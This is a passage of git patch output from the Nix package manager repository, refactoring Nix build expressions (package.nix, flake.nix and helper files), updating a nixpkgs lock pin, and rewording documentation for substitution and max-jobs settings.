stdenv.hostPlatform.isLinux '' - chmod u+w $out/lib/*.so.* - patchelf --set-rpath $out/lib:${stdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* - ''} - ${lib.optionalString stdenv.hostPlatform.isDarwin '' - for LIB in $out/lib/*.dylib; do - chmod u+w $LIB - install_name_tool -id $LIB $LIB - install_name_tool -delete_rpath ${boost}/lib/ $LIB || true - done - install_name_tool -change ${boost}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib - ''} - ''; + preConfigure = lib.optionalString (! stdenv.hostPlatform.isStatic) '' + # Copy libboost_context so we don't get all of Boost in our closure. + # https://github.com/NixOS/nixpkgs/issues/45462 + mkdir -p $out/lib + cp -pd ${boost}/lib/{libboost_context*,libboost_thread*,libboost_system*,libboost_regex*} $out/lib + rm -f $out/lib/*.a + ${lib.optionalString stdenv.hostPlatform.isLinux '' + chmod u+w $out/lib/*.so.* + patchelf --set-rpath $out/lib:${stdenv.cc.cc.lib}/lib $out/lib/libboost_thread.so.* + ''} + ${lib.optionalString stdenv.hostPlatform.isDarwin '' + for LIB in $out/lib/*.dylib; do + chmod u+w $LIB + install_name_tool -id $LIB $LIB + install_name_tool -delete_rpath ${boost}/lib/ $LIB || true + done + install_name_tool -change ${boost}/lib/libboost_system.dylib $out/lib/libboost_system.dylib $out/lib/libboost_thread.dylib + ''} + ''; configureFlags = lib.optionals stdenv.isLinux [ "--with-boost=${boost}/lib" "--with-sandbox-shell=${sh}/bin/busybox" ] - ++ lib.optionals (stdenv.isLinux && !(isStatic && stdenv.system == "aarch64-linux")) [ + ++ lib.optional (stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) "LDFLAGS=-fuse-ld=gold" - ] ++ [ "--sysconfdir=/etc" ] ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" ++ [ (lib.enableFeature finalAttrs.doCheck "tests") ] - ++ lib.optionals finalAttrs.doCheck ([ "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" ] - ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ - "--enable-install-unit-tests" - "--with-check-bin-dir=${builtins.placeholder "check"}/bin" - "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ]) + ++ lib.optionals finalAttrs.doCheck ( + [ "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" ] + ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ + "--enable-install-unit-tests" + "--with-check-bin-dir=${builtins.placeholder "check"}/bin" + "--with-check-lib-dir=${builtins.placeholder "check"}/lib" + ]) ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; enableParallelBuilding = true; makeFlags = "profiledir=$(out)/etc/profile.d PRECOMPILE_HEADERS=1"; - doCheck = true; - installFlags = "sysconfdir=$(out)/etc"; postInstall = '' From 7355a48b1a4ce2e393598c2a72ef520cba9d172d Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 1 Dec 2023 15:55:18 -0500 Subject: [PATCH 022/654] flake.lock: Update Nixpkgs to fix static build MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The problem was since switching to use libgit2, we had a package in our closure (`http-parser`) that was always trying to build as a shared object. Underlying Nixpkgs PR (a 23.05 backport) https://github.com/NixOS/nixpkgs/pull/271202 Flake lock file updates: • Updated input 'nixpkgs': 'github:NixOS/nixpkgs/9ba29e2346bc542e9909d1021e8fd7d4b3f64db0' (2023-11-13) → 'github:NixOS/nixpkgs/36c4ac09e9bebcec1fa7b7539cddb0c9e837409c' (2023-11-30) --- flake.lock | 8 ++++---- flake.nix | 8 +++++++- 2 files changed, 11 insertions(+), 5 deletions(-) diff --git a/flake.lock b/flake.lock index f120d3b5f..3cb9e72c9 100644 --- a/flake.lock +++ b/flake.lock @@ -50,16 +50,16 @@ }, "nixpkgs": { "locked": { - "lastModified": 1700748986, - "narHash": "sha256-/nqLrNU297h3PCw4QyDpZKZEUHmialJdZW2ceYFobds=", + "lastModified": 1701355166, + "narHash": "sha256-4V7XMI0Gd+y0zsi++cEHd99u3GNL0xSTGRmiWKzGnUQ=", "owner": "NixOS", "repo": "nixpkgs", - "rev": "9ba29e2346bc542e9909d1021e8fd7d4b3f64db0", + "rev": "36c4ac09e9bebcec1fa7b7539cddb0c9e837409c", "type": "github" }, "original": { "owner": "NixOS", - "ref": "nixos-23.05-small", + "ref": "staging-23.05", "repo": "nixpkgs", "type": "github" } diff --git a/flake.nix b/flake.nix index e2e510cbc..dbd45f053 100644 --- a/flake.nix +++ b/flake.nix @@ -1,7 +1,13 @@ { description = "The purely functional package manager"; - inputs.nixpkgs.url = "github:NixOS/nixpkgs/nixos-23.05-small"; + # TODO Go back to nixos-23.05-small once + # https://github.com/NixOS/nixpkgs/pull/271202 is merged. + # + # Also, do not grab arbitrary further staging commits. This PR was + # carefully made to be based on release-23.05 and just contain + # rebuild-causing changes to packages that Nix actually uses. + inputs.nixpkgs.url = "github:NixOS/nixpkgs/staging-23.05"; inputs.nixpkgs-regression.url = "github:NixOS/nixpkgs/215d4d0fd80ca5163643b03a33fde804a29cc1e2"; inputs.lowdown-src = { url = "github:kristapsdz/lowdown"; flake = false; }; inputs.flake-compat = { url = "github:edolstra/flake-compat"; flake = false; }; From 51adfb9b277fe54ad03fa2c9981585f123fcc200 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 2 Dec 2023 02:21:17 +0100 Subject: [PATCH 023/654] reword documentation on settings and attributes related to substitution - add links - be more concise - clarify the distinction between `preferLocalBuild` and `allowSubstitutes` --- .../src/language/advanced-attributes.md | 23 +++++-------------- src/libstore/globals.hh | 4 +--- 2 files changed, 7 insertions(+), 20 deletions(-) diff --git a/doc/manual/src/language/advanced-attributes.md b/doc/manual/src/language/advanced-attributes.md index 282b75af2..5a6c00cd4 100644 --- a/doc/manual/src/language/advanced-attributes.md +++ b/doc/manual/src/language/advanced-attributes.md @@ -257,29 +257,18 @@ Derivations can declare some infrequently used optional attributes. of the environment (typically, a few hundred kilobyte). - [`preferLocalBuild`]{#adv-attr-preferLocalBuild}\ - If this attribute is set to `true` and [distributed building is - enabled](../advanced-topics/distributed-builds.md), then, if - possible, the derivation will be built locally instead of forwarded - to a remote machine. This is appropriate for trivial builders - where the cost of doing a download or remote build would exceed - the cost of building locally. + If this attribute is set to `true` and [distributed building is enabled](../advanced-topics/distributed-builds.md), then, if possible, the derivation will be built locally instead of being forwarded to a remote machine. + This is useful for derivations that are cheapest to build locally. - [`allowSubstitutes`]{#adv-attr-allowSubstitutes}\ - If this attribute is set to `false`, then Nix will always build this - derivation; it will not try to substitute its outputs. This is - useful for very trivial derivations (such as `writeText` in Nixpkgs) - that are cheaper to build than to substitute from a binary cache. + If this attribute is set to `false`, then Nix will always build this derivation (locally or remotely); it will not try to substitute its outputs. + This is useful for derivations that are cheaper to build than to substitute. - You may disable the effects of this attibute by enabling the - `always-allow-substitutes` configuration option in Nix. + This attribute can be ignored by setting [`always-allow-substitutes`](@docroot@/command-ref/conf-file.md#conf-always-allow-substitutes) to `true`. > **Note** > - > You need to have a builder configured which satisfies the - > derivation’s `system` attribute, since the derivation cannot be - > substituted. Thus it is usually a good idea to align `system` with - > `builtins.currentSystem` when setting `allowSubstitutes` to - > `false`. For most trivial derivations this should be the case. + > If set to `false`, the [`builder`](./derivations.md#attr-builder) should be able to run on the system type specified in the [`system` attribute](./derivations.md#attr-system), since the derivation cannot be substituted. - [`__structuredAttrs`]{#adv-attr-structuredAttrs}\ If the special attribute `__structuredAttrs` is set to `true`, the other derivation diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index 38b0d516c..36ba51e23 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -268,9 +268,7 @@ public: Setting alwaysAllowSubstitutes{ this, false, "always-allow-substitutes", R"( - If set to `true`, Nix will ignore the `allowSubstitutes` attribute in - derivations and always attempt to use available substituters. - For more information on `allowSubstitutes`, see [the manual chapter on advanced attributes](../language/advanced-attributes.md). + If set to `true`, Nix will ignore the [`allowSubstitutes`](@docroot@/language/advanced-attributes.md) attribute in derivations and always attempt to use [available substituters](#conf-substituters). )"}; Setting buildersUseSubstitutes{ From 368fdb482da039fd40a1a51bbf851c54f65eb4c5 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 2 Dec 2023 03:06:47 +0100 Subject: [PATCH 024/654] reword description of the `builders-use-substitutes` setting --- src/libstore/globals.hh | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index 38b0d516c..dcdcd31d5 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -276,13 +276,10 @@ public: Setting buildersUseSubstitutes{ this, false, "builders-use-substitutes", R"( - If set to `true`, Nix will instruct remote build machines to use - their own binary substitutes if available. In practical terms, this - means that remote hosts will fetch as many build dependencies as - possible from their own substitutes (e.g, from `cache.nixos.org`), - instead of waiting for this host to upload them all. This can - drastically reduce build times if the network connection between - this computer and the remote build host is slow. + If set to `true`, Nix will instruct [remote build machines](#conf-builders) to use their own [`substituters`](#conf-substituters) if available. + + It means that remote build hosts will fetch as many dependencies as possible from their own substituters (e.g, from `cache.nixos.org`) instead of waiting for the local machine to upload them all. + This can drastically reduce build times if the network connection between the local machine and the remote build host is slow. )"}; Setting reservedSize{this, 8 * 1024 * 1024, "gc-reserved-space", From 5b281ddf50775ff37577f80cd3f1f7dbf76c9762 Mon Sep 17 00:00:00 2001 From: Valentin Gagarin Date: Sat, 2 Dec 2023 02:13:11 +0100 Subject: [PATCH 025/654] reword description of the `max-jobs` setting - remove prose for the default value, which is shown programmatically - add note on how this relates to `cores` - add link to mentioned derivation attribute --- src/libstore/globals.hh | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/src/libstore/globals.hh b/src/libstore/globals.hh index 38b0d516c..7a30c5ae2 100644 --- a/src/libstore/globals.hh +++ b/src/libstore/globals.hh @@ -151,13 +151,18 @@ public: MaxBuildJobsSetting maxBuildJobs{ this, 1, "max-jobs", R"( - This option defines the maximum number of jobs that Nix will try to - build in parallel. The default is `1`. The special value `auto` - causes Nix to use the number of CPUs in your system. `0` is useful - when using remote builders to prevent any local builds (except for - `preferLocalBuild` derivation attribute which executes locally - regardless). It can be overridden using the `--max-jobs` (`-j`) - command line switch. + Maximum number of jobs that Nix will try to build locally in parallel. + + The special value `auto` causes Nix to use the number of CPUs in your system. + Use `0` to disable local builds and directly use the remote machines specified in [`builders`](#conf-builders). + This will not affect derivations that have [`preferLocalBuild = true`](@docroot@/language/advanced-attributes.md#adv-attr-preferLocalBuild), which are always built locally. + + > **Note** + > + > The number of CPU cores to use for each build job is independently determined by the [`cores`](#conf-cores) setting. + + + The setting can be overridden using the `--max-jobs` (`-j`) command line switch. )", {"build-max-jobs"}}; From 2c3749a335d4462412ac73eb77a81d949e1e8ba6 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Sat, 2 Dec 2023 16:08:06 +0000 Subject: [PATCH 026/654] Fix cross builds --- package.nix | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/package.nix b/package.nix index bed77ba3b..9f30eef2f 100644 --- a/package.nix +++ b/package.nix @@ -123,6 +123,10 @@ stdenv.mkDerivation (finalAttrs: { openssl sqlite xz + + # These could be checkInputs but the configure phase fails w/o them + gtest + rapidcheck ] ++ lib.optional stdenv.isLinux libseccomp ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid @@ -137,14 +141,13 @@ stdenv.mkDerivation (finalAttrs: { doCheck = true; checkInputs = [ - gtest - rapidcheck + # see buildInputs. The configure script always wants its test libs ]; nativeCheckInputs = [ git - mercurial # FIXME: remove? only needed for tests - openssh # only needed for tests (ssh-keygen) + mercurial + openssh ]; propagatedBuildInputs = [ From ca598328085fe7a379bff8777031101fba80921b Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Sat, 2 Dec 2023 16:36:59 +0000 Subject: [PATCH 027/654] Fix coverage.nix --- coverage.nix | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/coverage.nix b/coverage.nix index 2390ef52d..f952d8b09 100644 --- a/coverage.nix +++ b/coverage.nix @@ -14,19 +14,21 @@ releaseTools.coverageAnalysis { inherit (nix) src - configureFlags - nativeBuildInputs buildInputs - #checkInputs + nativeBuildInputs + propagatedBuildInputs + configureFlags + makeFlags + installFlags + doInstallCheck + installCheckFlags + installCheckTarget ; enableParallelBuilding = true; dontInstall = false; - doInstallCheck = true; - installCheckTarget = "installcheck"; # work around buggy detection in stdenv - lcovFilter = [ "*/boost/*" "*-tab.*" ]; hardeningDisable = ["fortify"]; From 118fa9689ab0e6d12b360708177f9a1b56f3d466 Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Sat, 2 Dec 2023 16:42:01 +0000 Subject: [PATCH 028/654] Create internal-api-docs.nix --- flake.nix | 17 +---------------- internal-api-docs.nix | 24 ++++++++++++++++++++++++ 2 files changed, 25 insertions(+), 16 deletions(-) create mode 100644 internal-api-docs.nix diff --git a/flake.nix b/flake.nix index c0841a76d..b1c3a777e 100644 --- a/flake.nix +++ b/flake.nix @@ -482,22 +482,7 @@ coverage = nixpkgsFor.x86_64-linux.native.callPackage ./coverage.nix {}; # API docs for Nix's unstable internal C++ interfaces. - internal-api-docs = nixpkgsFor.x86_64-linux.native.nix.overrideAttrs (old: { - pname = "nix-internal-api-docs"; - - configureFlags = old.configureFlags ++ [ "--enable-internal-api-docs" ]; - nativeBuildInputs = old.nativeBuildInputs ++ [ nixpkgsFor.x86_64-linux.native.doxygen ]; - - dontBuild = true; - doCheck = false; - - installTargets = [ "internal-api-html" ]; - - postInstall = '' - mkdir -p $out/nix-support - echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products - ''; - }); + internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./internal-api-docs.nix {}; # System tests. tests = import ./tests/nixos { inherit lib nixpkgs nixpkgsFor; } // { diff --git a/internal-api-docs.nix b/internal-api-docs.nix new file mode 100644 index 000000000..ddd3fa891 --- /dev/null +++ b/internal-api-docs.nix @@ -0,0 +1,24 @@ +{ nix +, doxygen +}: + +nix.overrideAttrs (old: { + pname = "nix-internal-api-docs"; + + configureFlags = old.configureFlags ++ [ + "--enable-internal-api-docs" + ]; + nativeBuildInputs = old.nativeBuildInputs ++ [ + doxygen + ]; + + dontBuild = true; + doCheck = false; + + installTargets = [ "internal-api-html" ]; + + postInstall = '' + mkdir -p $out/nix-support + echo "doc internal-api-docs $out/share/doc/nix/internal-api/html" >> $out/nix-support/hydra-build-products + ''; +}) From 19d41fb20a45d2bf66f78813514bf5c5fd420a8b Mon Sep 17 00:00:00 2001 From: Jacek Galowicz Date: Sat, 2 Dec 2023 17:25:47 +0000 Subject: [PATCH 029/654] Fix stuff --- flake.nix | 230 +++--------------------------------------- package.nix | 60 ++++++----- test-nix-versions.nix | 50 +++++++++ 3 files changed, 96 insertions(+), 244 deletions(-) create mode 100644 test-nix-versions.nix diff --git a/flake.nix b/flake.nix index b1c3a777e..fbce13604 100644 --- a/flake.nix +++ b/flake.nix @@ -12,6 +12,14 @@ let inherit (nixpkgs) lib; + # Experimental fileset library: https://github.com/NixOS/nixpkgs/pull/222981 + # Not an "idiomatic" flake input because: + # - Propagation to dependent locks: https://github.com/NixOS/nix/issues/7730 + # - Subflake would download redundant and huge parent flake + # - No git tree hash support: https://github.com/NixOS/nix/issues/6044 + inherit (import (builtins.fetchTarball { url = "https://github.com/NixOS/nix/archive/1bdcd7fc8a6a40b2e805bad759b36e64e911036b.tar.gz"; sha256 = "sha256:14ljlpdsp4x7h1fkhbmc4bd3vsqnx8zdql4h3037wh09ad6a0893"; })) + fileset; + officialRelease = false; # Set to true to build the release notes for the next release. @@ -56,57 +64,6 @@ }) stdenvs); - # Experimental fileset library: https://github.com/NixOS/nixpkgs/pull/222981 - # Not an "idiomatic" flake input because: - # - Propagation to dependent locks: https://github.com/NixOS/nix/issues/7730 - # - Subflake would download redundant and huge parent flake - # - No git tree hash support: https://github.com/NixOS/nix/issues/6044 - inherit (import (builtins.fetchTarball { url = "https://github.com/NixOS/nix/archive/1bdcd7fc8a6a40b2e805bad759b36e64e911036b.tar.gz"; sha256 = "sha256:14ljlpdsp4x7h1fkhbmc4bd3vsqnx8zdql4h3037wh09ad6a0893"; })) - fileset; - - baseFiles = - # .gitignore has already been processed, so any changes in it are irrelevant - # at this point. It is not represented verbatim for test purposes because - # that would interfere with repo semantics. - fileset.fileFilter (f: f.name != ".gitignore") ./.; - - configureFiles = fileset.unions [ - ./.version - ./configure.ac - ./m4 - # TODO: do we really need README.md? It doesn't seem used in the build. - ./README.md - ]; - - topLevelBuildFiles = fileset.unions [ - ./local.mk - ./Makefile - ./Makefile.config.in - ./mk - ]; - - functionalTestFiles = fileset.unions [ - ./tests/functional - (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) - ]; - - nixSrc = fileset.toSource { - root = ./.; - fileset = fileset.intersect baseFiles (fileset.unions [ - configureFiles - topLevelBuildFiles - ./boehmgc-coroutine-sp-fallback.diff - ./doc - ./misc - ./precompiled-headers.h - ./src - ./unit-test-data - ./COPYING - ./scripts/local.mk - functionalTestFiles - ]); - }; - # Memoize nixpkgs for different platforms for efficiency. nixpkgsFor = forAllSystems (system: let @@ -131,130 +88,6 @@ cross = forAllCrossSystems (crossSystem: make-pkgs crossSystem "stdenv"); }); - commonDeps = - { pkgs - , isStatic ? pkgs.stdenv.hostPlatform.isStatic - }: - with pkgs; rec { - # Use "busybox-sandbox-shell" if present, - # if not (legacy) fallback and hope it's sufficient. - sh = pkgs.busybox-sandbox-shell or (busybox.override { - useMusl = true; - enableStatic = true; - enableMinimal = true; - extraConfig = '' - CONFIG_FEATURE_FANCY_ECHO y - CONFIG_FEATURE_SH_MATH y - CONFIG_FEATURE_SH_MATH_64 y - - CONFIG_ASH y - CONFIG_ASH_OPTIMIZE_FOR_SIZE y - - CONFIG_ASH_ALIAS y - CONFIG_ASH_BASH_COMPAT y - CONFIG_ASH_CMDCMD y - CONFIG_ASH_ECHO y - CONFIG_ASH_GETOPTS y - CONFIG_ASH_INTERNAL_GLOB y - CONFIG_ASH_JOB_CONTROL y - CONFIG_ASH_PRINTF y - CONFIG_ASH_TEST y - ''; - }); - - configureFlags = - lib.optionals stdenv.isLinux [ - "--with-boost=${boost-nix}/lib" - "--with-sandbox-shell=${sh}/bin/busybox" - ] - ++ lib.optionals (stdenv.isLinux && !(isStatic && stdenv.system == "aarch64-linux")) [ - "LDFLAGS=-fuse-ld=gold" - ]; - - testConfigureFlags = [ - "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" - ] ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ - "--enable-install-unit-tests" - "--with-check-bin-dir=${builtins.placeholder "check"}/bin" - "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ]; - - internalApiDocsConfigureFlags = [ - "--enable-internal-api-docs" - ]; - - inherit (pkgs.buildPackages) changelog-d; - - nativeBuildDeps = - [ - buildPackages.bison - buildPackages.flex - (lib.getBin buildPackages.lowdown-nix) - buildPackages.mdbook - buildPackages.mdbook-linkcheck - buildPackages.autoconf-archive - buildPackages.autoreconfHook - buildPackages.pkg-config - - # Tests - buildPackages.git - buildPackages.mercurial # FIXME: remove? only needed for tests - buildPackages.jq # Also for custom mdBook preprocessor. - buildPackages.openssh # only needed for tests (ssh-keygen) - ] - ++ lib.optionals stdenv.hostPlatform.isLinux [(buildPackages.util-linuxMinimal or buildPackages.utillinuxMinimal)] - # Official releases don't have rl-next, so we don't need to compile a changelog - ++ lib.optional (!officialRelease && buildUnreleasedNotes) changelog-d - ; - - buildDeps = - [ curl - bzip2 xz brotli editline - openssl sqlite - libarchive - (pkgs.libgit2.overrideAttrs (attrs: { - src = libgit2; - version = libgit2.lastModifiedDate; - cmakeFlags = (attrs.cmakeFlags or []) ++ ["-DUSE_SSH=exec"]; - })) - boost-nix - lowdown-nix - libsodium - ] - ++ lib.optionals stdenv.isLinux [libseccomp] - ++ lib.optional stdenv.hostPlatform.isx86_64 libcpuid; - - checkDeps = [ - gtest - rapidcheck - ]; - - internalApiDocsDeps = [ - buildPackages.doxygen - ]; - - awsDeps = lib.optional (stdenv.isLinux || stdenv.isDarwin) - (aws-sdk-cpp.override { - apis = ["s3" "transfer"]; - customMemoryManagement = false; - }); - - propagatedDeps = - [ ((boehmgc.override { - enableLargeConfig = true; - }).overrideAttrs(o: { - patches = (o.patches or []) ++ [ - ./boehmgc-coroutine-sp-fallback.diff - - # https://github.com/ivmai/bdwgc/pull/586 - ./boehmgc-traceable_allocator-public.diff - ]; - }) - ) - nlohmann_json - ]; - }; - installScriptFor = systems: with nixpkgsFor.x86_64-linux.native; runCommand "installer-script" @@ -289,50 +122,11 @@ echo "file installer $out/install" >> $out/nix-support/hydra-build-products ''; - testNixVersions = pkgs: client: daemon: with commonDeps { inherit pkgs; }; with pkgs.lib; pkgs.stdenv.mkDerivation { - NIX_DAEMON_PACKAGE = daemon; - NIX_CLIENT_PACKAGE = client; - name = - "nix-tests" - + optionalString - (versionAtLeast daemon.version "2.4pre20211005" && - versionAtLeast client.version "2.4pre20211005") - "-${client.version}-against-${daemon.version}"; - inherit version; - - src = fileset.toSource { - root = ./.; - fileset = fileset.intersect baseFiles (fileset.unions [ - configureFiles - topLevelBuildFiles - functionalTestFiles - ]); + testNixVersions = pkgs: client: daemon: + pkgs.callPackage ./test-nix-versions.nix { + inherit client daemon fileset; }; - VERSION_SUFFIX = versionSuffix; - - nativeBuildInputs = nativeBuildDeps; - buildInputs = buildDeps ++ awsDeps ++ checkDeps; - propagatedBuildInputs = propagatedDeps; - - enableParallelBuilding = true; - - configureFlags = - testConfigureFlags # otherwise configure fails - ++ [ "--disable-build" ]; - dontBuild = true; - doInstallCheck = true; - - installPhase = '' - mkdir -p $out - ''; - - installCheckPhase = '' - mkdir -p src/nix-channel - make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES - ''; - }; - binaryTarball = nix: pkgs: pkgs.callPackage ./binary-tarball.nix { inherit nix; }; @@ -491,7 +285,7 @@ # on a particular version of Nixpkgs. evalNixpkgs = let - inherit (nixpkgsFor.x86_64-linux.native) runCommand nix nixpkgs-regression; + inherit (nixpkgsFor.x86_64-linux.native) runCommand nix; in runCommand "eval-nixos" { buildInputs = [ nix ]; } '' diff --git a/package.nix b/package.nix index 9f30eef2f..e4c66958b 100644 --- a/package.nix +++ b/package.nix @@ -43,6 +43,30 @@ let version = lib.fileContents ./.version + versionSuffix; canRunInstalled = stdenv.buildPlatform.canExecute stdenv.hostPlatform; + + filesets = { + baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; + + configureFiles = fileset.unions [ + ./.version + ./configure.ac + ./m4 + # TODO: do we really need README.md? It doesn't seem used in the build. + ./README.md + ]; + + topLevelBuildFiles = fileset.unions [ + ./local.mk + ./Makefile + ./Makefile.config.in + ./mk + ]; + + functionalTestFiles = fileset.unions [ + ./tests/functional + (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) + ]; + }; in stdenv.mkDerivation (finalAttrs: { @@ -51,33 +75,13 @@ stdenv.mkDerivation (finalAttrs: { src = let - baseFiles = fileset.fileFilter (f: f.name != ".gitignore") ./.; - configureFiles = fileset.unions [ - ./.version - ./configure.ac - ./m4 - # TODO: do we really need README.md? It doesn't seem used in the build. - ./README.md - ]; - - topLevelBuildFiles = fileset.unions [ - ./local.mk - ./Makefile - ./Makefile.config.in - ./mk - ]; - - functionalTestFiles = fileset.unions [ - ./tests/functional - (fileset.fileFilter (f: lib.strings.hasPrefix "nix-profile" f.name) ./scripts) - ]; in fileset.toSource { root = ./.; - fileset = fileset.intersect baseFiles (fileset.unions [ - configureFiles - topLevelBuildFiles + fileset = fileset.intersect filesets.baseFiles (fileset.unions [ + filesets.configureFiles + filesets.topLevelBuildFiles ./boehmgc-coroutine-sp-fallback.diff ./doc ./misc @@ -86,7 +90,7 @@ stdenv.mkDerivation (finalAttrs: { ./unit-test-data ./COPYING ./scripts/local.mk - functionalTestFiles + filesets.functionalTestFiles ]); }; @@ -231,8 +235,12 @@ stdenv.mkDerivation (finalAttrs: { hardeningDisable = lib.optional stdenv.hostPlatform.isStatic "pie"; - passthru.perl-bindings = callPackage ./perl { - inherit fileset stdenv; + passthru ={ + inherit filesets; + + perl-bindings = callPackage ./perl { + inherit fileset stdenv; + }; }; meta.platforms = lib.platforms.unix; diff --git a/test-nix-versions.nix b/test-nix-versions.nix new file mode 100644 index 000000000..15f6cd8d0 --- /dev/null +++ b/test-nix-versions.nix @@ -0,0 +1,50 @@ +{ lib +, fileset +, stdenv +, client +, daemon +}: + +stdenv.mkDerivation { + NIX_DAEMON_PACKAGE = daemon; + NIX_CLIENT_PACKAGE = client; + name = + "nix-tests" + + lib.optionalString + (lib.versionAtLeast daemon.version "2.4pre20211005" && + lib.versionAtLeast client.version "2.4pre20211005") + "-${client.version}-against-${daemon.version}"; + + inherit (client) + version + VERSION_SUFFIX + nativeBuildInputs + buildInputs + propagatedBuildInputs + ; + + src = fileset.toSource { + root = ./.; + fileset = with client.passthru.filesets; + fileset.intersect baseFiles (fileset.unions [ + configureFiles + topLevelBuildFiles + functionalTestFiles + ]); + }; + + configureFlags = client.configureFlags # otherwise configure fails + ++ [ "--disable-build" ]; + + dontBuild = true; + doInstallCheck = true; + + installPhase = '' + mkdir -p $out + ''; + + installCheckPhase = '' + mkdir -p src/nix-channel + make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES + ''; +} From 0ca49b0c8663ae82931780ae3f1f45115b966285 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 12:47:07 -0500 Subject: [PATCH 030/654] Add installing unit test flags --- package.nix | 37 ++++++++++++++++++++++++++----------- 1 file changed, 26 insertions(+), 11 deletions(-) diff --git a/package.nix b/package.nix index e4c66958b..c1a3b9455 100644 --- a/package.nix +++ b/package.nix @@ -38,6 +38,17 @@ , sqlite , util-linux , xz + +# Configuration Options +# +# This probably seems like too many degrees of freedom, but it +# faithfully reflects how the underlying configure + make build system +# work. The top-level flake.nix will choose useful combinations. + +# Whether to install unit tests. This is useful when cross compiling +# since we cannot run them natively during the build, but can do so +# later. +, installUnitTests ? stdenv.hostPlatform != stdenv.buildPlatform }: let @@ -69,7 +80,13 @@ let }; in -stdenv.mkDerivation (finalAttrs: { +stdenv.mkDerivation (finalAttrs: let + + # Either running the unit tests during the build, or installing them + # to be run later, requiresthe unit tests to be built. + buildUnitTests = finalAttrs.doCheck || installUnitTests; + +in { pname = "nix"; inherit version; @@ -97,7 +114,7 @@ stdenv.mkDerivation (finalAttrs: { VERSION_SUFFIX = versionSuffix; outputs = [ "out" "dev" "doc" ] - ++ lib.optional (stdenv.hostPlatform != stdenv.buildPlatform) "check"; + ++ lib.optional installUnitTests "check"; nativeBuildInputs = [ bison @@ -142,7 +159,7 @@ stdenv.mkDerivation (finalAttrs: { }) ; - doCheck = true; + doCheck = stdenv.hostPlatform != stdenv.buildPlatform; checkInputs = [ # see buildInputs. The configure script always wants its test libs @@ -190,14 +207,12 @@ stdenv.mkDerivation (finalAttrs: { "LDFLAGS=-fuse-ld=gold" ++ [ "--sysconfdir=/etc" ] ++ lib.optional stdenv.hostPlatform.isStatic "--enable-embedded-sandbox-shell" - ++ [ (lib.enableFeature finalAttrs.doCheck "tests") ] - ++ lib.optionals finalAttrs.doCheck ( - [ "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" ] - ++ lib.optionals (stdenv.hostPlatform != stdenv.buildPlatform) [ - "--enable-install-unit-tests" - "--with-check-bin-dir=${builtins.placeholder "check"}/bin" - "--with-check-lib-dir=${builtins.placeholder "check"}/lib" - ]) + ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include" + ++ lib.optionals installUnitTests [ + "--enable-install-unit-tests" + "--with-check-bin-dir=${builtins.placeholder "check"}/bin" + "--with-check-lib-dir=${builtins.placeholder "check"}/lib" + ] ++ lib.optional (!canRunInstalled) "--disable-doc-gen"; enableParallelBuilding = true; From ce598bae144c49c61b33cdf55679ef597ede9485 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 3 Dec 2023 14:10:09 -0500 Subject: [PATCH 031/654] WIP --- coverage.nix | 8 --- flake.nix | 7 ++- internal-api-docs.nix | 24 ------- package.nix | 143 ++++++++++++++++++++++++++++++++---------- test-nix-versions.nix | 35 ----------- 5 files changed, 117 insertions(+), 100 deletions(-) delete mode 100644 internal-api-docs.nix diff --git a/coverage.nix b/coverage.nix index f952d8b09..2c5e4a06d 100644 --- a/coverage.nix +++ b/coverage.nix @@ -26,12 +26,4 @@ releaseTools.coverageAnalysis { ; enableParallelBuilding = true; - - dontInstall = false; - - lcovFilter = [ "*/boost/*" "*-tab.*" ]; - - hardeningDisable = ["fortify"]; - - NIX_CFLAGS_COMPILE = "-DCOVERAGE=1"; } diff --git a/flake.nix b/flake.nix index fbce13604..44ce2d306 100644 --- a/flake.nix +++ b/flake.nix @@ -276,7 +276,12 @@ coverage = nixpkgsFor.x86_64-linux.native.callPackage ./coverage.nix {}; # API docs for Nix's unstable internal C++ interfaces. - internal-api-docs = nixpkgsFor.x86_64-linux.native.callPackage ./internal-api-docs.nix 